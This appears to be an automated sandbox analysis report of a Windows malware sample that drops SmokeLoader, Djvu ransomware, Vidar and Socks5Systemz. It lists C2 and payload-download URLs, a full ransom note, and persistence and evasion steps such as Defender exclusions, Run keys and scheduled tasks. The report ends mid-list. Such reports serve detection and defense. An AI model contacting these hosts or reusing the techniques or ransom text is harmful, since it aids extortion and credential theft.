Resubmissions
22-08-2024 15:33
240822-sy6bqsvbng 710-03-2024 16:21
240310-ttpc4aga89 1010-03-2024 12:34
240310-prvpwacf93 10Analysis
-
max time kernel
331s -
max time network
705s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
10-03-2024 16:21
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20240226-en
General
-
Target
file.exe
-
Size
2.4MB
-
MD5
b11c3fad2e48022f58635df7368d6441
-
SHA1
63883fee892ac1e0d44f568913931c0d59b343d1
-
SHA256
2a362d6d3bceaf1159bc245499a778f1ab9c229c3cbd4be4c63a582a716a4c80
-
SHA512
6c68523b259c307e1c4ff4c6809fb20e5d9d9998a32d03ca06eaf29ec8f27bcaca2cafd9b57420b307160b3ebfeac16d234b99f6119f8f3038f4b5bf4b169023
-
SSDEEP
49152:jCqqfqaaK++EFUw2PsQMIZnLzn8FGaqxMBeVBBzKl:jONGXqGY1y
Malware Config
Extracted
smokeloader
pub1
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Extracted
djvu
http://sajdfue.com/test1/get.php
-
extension
.wisz
-
offline_id
4p0Nzrg1q0ND5of5Gtp2UBjthSXuE8VxnMrd4vt1
-
payload_url
http://sdfjhuz.com/dl/build2.exe
http://sajdfue.com/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. Do not ask assistants from youtube and recovery data sites for help in recovering your data. They can use your free decryption quota and scam you. Our contact is emails in this text document only. You can get and look video overview decrypt tool: https://wetransfer.com/downloads/a832401adcd58098c699f768ffea4f1720240305114308/7e601a Price of private key and decrypt software is $999. Discount 50% available if you contact us first 72 hours, that's price for you is $499. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0853PsawqS
Extracted
vidar
8.1
e2da5861d01d391b927839bbec00e666
https://steamcommunity.com/profiles/76561199649267298
https://t.me/uprizin
-
profile_id_v2
e2da5861d01d391b927839bbec00e666
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 OPR/96.0.0.0
Extracted
socks5systemz
http://bwxobsm.com/search/?q=67e28dd86a5ef62a130aa5197c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978a771ea771795af8e05c644db22f31df92d8b38e316a667d307eca743ec4c2b07b52966923a678ef719c0eb95
http://bwxobsm.com/search/?q=67e28dd86a5ef62a130aa5197c27d78406abdd88be4b12eab517aa5c96bd86ef928749825a8bbc896c58e713bc90c91936b5281fc235a925ed3e04d6bd974a95129070b617e96cc92be20ea778c255bbe258b90d3b4eed3233d1626a8ff810c0ef9d923bc96f
http://bmoarca.com/search/?q=67e28dd86a5ef62a130aa5197c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978a771ea771795af8e05c644db22f31df92d8b38e316a667d307eca743ec4c2b07b52966923a678ef719c0eb95
Signatures
-
DcRat 15 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 316 schtasks.exe 624 schtasks.exe Key created \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\SystemCertificates\My AddInProcess32.exe 2856 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" BHyvkIgo1eAG39KMFmpK1JKB.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oiwoojO7aCnS76ky0A3P8DMx.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lxA3XocXtP9XlNgjC5O7KuK.bat AddInProcess32.exe 1264 schtasks.exe 2680 schtasks.exe 604 schtasks.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2sJVfkT27wtG2C4trNOQAZnM.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JMztMoTunBObvxw75ySU1GJv.bat AddInProcess32.exe 1540 schtasks.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mZZHXrrVKMKMXnLVwLQEKizp.bat AddInProcess32.exe 2216 schtasks.exe -
Detect Socks5Systemz Payload 2 IoCs
resource yara_rule behavioral1/memory/448-588-0x0000000002660000-0x0000000002704000-memory.dmp family_socks5systemz behavioral1/memory/448-704-0x0000000002660000-0x0000000002704000-memory.dmp family_socks5systemz -
Detect Vidar Stealer 4 IoCs
resource yara_rule behavioral1/memory/1880-574-0x0000000000230000-0x0000000000262000-memory.dmp family_vidar_v7 behavioral1/memory/1032-585-0x0000000000400000-0x0000000000645000-memory.dmp family_vidar_v7 behavioral1/memory/1032-701-0x0000000000400000-0x0000000000645000-memory.dmp family_vidar_v7 behavioral1/memory/1032-751-0x0000000000400000-0x0000000000645000-memory.dmp family_vidar_v7 -
Detected Djvu ransomware 6 IoCs
resource yara_rule behavioral1/memory/2112-457-0x0000000001E50000-0x0000000001F6B000-memory.dmp family_djvu behavioral1/memory/2416-462-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/2416-491-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1952-505-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/1880-573-0x0000000002080000-0x0000000002180000-memory.dmp family_djvu behavioral1/memory/1952-587-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba payload 10 IoCs
resource yara_rule behavioral1/memory/1972-122-0x0000000002CB0000-0x000000000359B000-memory.dmp family_glupteba behavioral1/memory/1972-123-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1972-182-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/1972-186-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/832-211-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/832-284-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/832-297-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2064-308-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2064-360-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2064-439-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BHyvkIgo1eAG39KMFmpK1JKB.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe -
Modifies boot configuration data using bcdedit 14 IoCs
pid Process 2596 bcdedit.exe 1396 bcdedit.exe 1948 bcdedit.exe 3020 bcdedit.exe 2332 bcdedit.exe 2128 bcdedit.exe 2280 bcdedit.exe 2540 bcdedit.exe 2120 bcdedit.exe 2408 bcdedit.exe 888 bcdedit.exe 2932 bcdedit.exe 2652 bcdedit.exe 2132 bcdedit.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\system32\drivers\Winmon.sys csrss.exe File created C:\Windows\system32\drivers\etc\hosts PHZUeKsym6c4ao1N4lAzfMjT.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 2924 netsh.exe -
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Stops running service(s) 3 TTPs
-
Drops startup file 11 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JMztMoTunBObvxw75ySU1GJv.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mZZHXrrVKMKMXnLVwLQEKizp.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5865l1C9DxinGCBdGI6B1MoP.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MFwUaZAUUG4Bz1JYIKNt5db6.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oiwoojO7aCnS76ky0A3P8DMx.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7lxA3XocXtP9XlNgjC5O7KuK.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2sJVfkT27wtG2C4trNOQAZnM.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QtGQLyuChGgsFZ31jtks8XvM.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rp0Gte16gcoJAEqdk4xsl0HN.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4nvAvIM2vYQKd9Cp7nQ9lAyZ.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h0iow1IYrorSkOj3adeAxdGj.bat AddInProcess32.exe -
Executes dropped EXE 42 IoCs
pid Process 1744 Hz5DKFVHt5wmDrYd00peGwos.exe 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 1972 BHyvkIgo1eAG39KMFmpK1JKB.exe 2304 babyclock.exe 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 992 syncUpd.exe 448 babyclock.exe 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 2656 BroomSetup.exe 2064 csrss.exe 1956 patch.exe 1248 injector.exe 2012 dsefix.exe 2112 FE0F.exe 2416 FE0F.exe 604 FE0F.exe 1952 FE0F.exe 1756 windefender.exe 2704 windefender.exe 1880 build2.exe 2640 build3.exe 1032 build2.exe 304 build3.exe 2236 PHZUeKsym6c4ao1N4lAzfMjT.exe 2640 mstsca.exe 2328 mstsca.exe 3064 updater.exe 2252 8D34.exe 884 mstsca.exe 3060 mstsca.exe 472 2437.exe 1600 mstsca.exe 2752 mstsca.exe 2480 vgtejgi 2276 mstsca.exe 1892 GHuvLZsqsmCMoGgf6n6VLvxo.exe 1624 syncUpd.exe 336 RuIUvkS8wVfymaAK7lF9BY8u.exe 2224 wz8VvURJ6HobiJci3zt7FzSf.exe 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp 1000 FusMm6h3ZIYvS3H6ML4oKi29.exe -
Loads dropped DLL 64 IoCs
pid Process 1260 AddInProcess32.exe 1260 AddInProcess32.exe 1260 AddInProcess32.exe 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 1260 AddInProcess32.exe 1260 AddInProcess32.exe 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 1260 AddInProcess32.exe 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 860 Process not Found 1956 patch.exe 1956 patch.exe 1956 patch.exe 1956 patch.exe 1956 patch.exe 2064 csrss.exe 1956 patch.exe 1956 patch.exe 1956 patch.exe 2064 csrss.exe 2112 FE0F.exe 2416 FE0F.exe 2416 FE0F.exe 604 FE0F.exe 992 syncUpd.exe 992 syncUpd.exe 1952 FE0F.exe 1952 FE0F.exe 1952 FE0F.exe 1952 FE0F.exe 1896 WerFault.exe 1896 WerFault.exe 1896 WerFault.exe 1896 WerFault.exe 1260 AddInProcess32.exe 1260 AddInProcess32.exe 480 Process not Found 480 Process not Found 2408 WerFault.exe 2408 WerFault.exe 2408 WerFault.exe 1208 Process not Found 1260 AddInProcess32.exe 1892 GHuvLZsqsmCMoGgf6n6VLvxo.exe 1892 GHuvLZsqsmCMoGgf6n6VLvxo.exe 1892 GHuvLZsqsmCMoGgf6n6VLvxo.exe 1260 AddInProcess32.exe 1260 AddInProcess32.exe 1260 AddInProcess32.exe 2224 wz8VvURJ6HobiJci3zt7FzSf.exe 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 1224 icacls.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0007000000016c4a-271.dat upx behavioral1/files/0x0007000000016c4a-279.dat upx behavioral1/memory/2656-283-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral1/memory/2656-358-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral1/memory/1756-508-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2704-509-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/1756-511-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/memory/2704-666-0x0000000000400000-0x00000000008DF000-memory.dmp upx behavioral1/files/0x0007000000016c4a-1138.dat upx behavioral1/files/0x000600000001a4d5-1249.dat upx behavioral1/files/0x000600000001a4d9-1339.dat upx behavioral1/files/0x000500000001a4e0-1345.dat upx -
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 141.98.234.31 Destination IP 141.98.234.31 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\BHyvkIgo1eAG39KMFmpK1JKB.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" BHyvkIgo1eAG39KMFmpK1JKB.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\f55404de-f96d-40e3-8f6a-c259dbe6d608\\FE0F.exe\" --AutoStart" FE0F.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 173 pastebin.com 174 pastebin.com 2663 pastebin.com 2665 pastebin.com 3 pastebin.com 4 pastebin.com 88 bitbucket.org 89 bitbucket.org -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 79 api.2ip.ua 57 api.2ip.ua 58 api.2ip.ua -
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
description ioc Process File opened for modification \??\WinMon csrss.exe -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe updater.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe PHZUeKsym6c4ao1N4lAzfMjT.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 2528 set thread context of 1260 2528 file.exe 28 PID 2112 set thread context of 2416 2112 FE0F.exe 100 PID 604 set thread context of 1952 604 FE0F.exe 107 PID 1880 set thread context of 1032 1880 build2.exe 116 PID 2640 set thread context of 304 2640 build3.exe 118 PID 2640 set thread context of 2328 2640 mstsca.exe 126 PID 3064 set thread context of 920 3064 updater.exe 180 PID 3064 set thread context of 2460 3064 updater.exe 185 PID 884 set thread context of 3060 884 mstsca.exe 193 PID 1600 set thread context of 2752 1600 mstsca.exe 197 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN BHyvkIgo1eAG39KMFmpK1JKB.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File created C:\Windows\rss\csrss.exe BHyvkIgo1eAG39KMFmpK1JKB.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\Logs\CBS\CbsPersist_20240310162609.cab makecab.exe File opened for modification C:\Windows\rss BHyvkIgo1eAG39KMFmpK1JKB.exe -
Launches sc.exe 34 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2448 sc.exe 1984 sc.exe 2044 sc.exe 2900 sc.exe 560 sc.exe 2144 sc.exe 1804 sc.exe 1860 sc.exe 1760 sc.exe 2636 sc.exe 1968 sc.exe 1872 sc.exe 1132 sc.exe 2720 sc.exe 1864 sc.exe 3012 sc.exe 2936 sc.exe 1864 sc.exe 2980 sc.exe 2208 sc.exe 2032 sc.exe 904 sc.exe 1200 sc.exe 1152 sc.exe 2084 sc.exe 1208 sc.exe 1892 sc.exe 2532 sc.exe 1928 sc.exe 2276 sc.exe 2400 sc.exe 1784 sc.exe 472 sc.exe 2528 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 1896 1032 WerFault.exe 116 2408 2252 WerFault.exe 187 -
NSIS installer 1 IoCs
resource yara_rule behavioral1/files/0x0006000000016eb2-162.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vgtejgi Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RuIUvkS8wVfymaAK7lF9BY8u.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RuIUvkS8wVfymaAK7lF9BY8u.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vgtejgi Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Hz5DKFVHt5wmDrYd00peGwos.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Hz5DKFVHt5wmDrYd00peGwos.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI vgtejgi Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RuIUvkS8wVfymaAK7lF9BY8u.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Hz5DKFVHt5wmDrYd00peGwos.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString syncUpd.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 syncUpd.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 624 schtasks.exe 1264 schtasks.exe 2216 schtasks.exe 2680 schtasks.exe 604 schtasks.exe 2856 schtasks.exe 316 schtasks.exe 1540 schtasks.exe -
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 220 Go-http-client/1.1 HTTP User-Agent header 222 Go-http-client/1.1 HTTP User-Agent header 227 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-261 = "GMT Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-22 = "Cape Verde Standard Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" BHyvkIgo1eAG39KMFmpK1JKB.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh 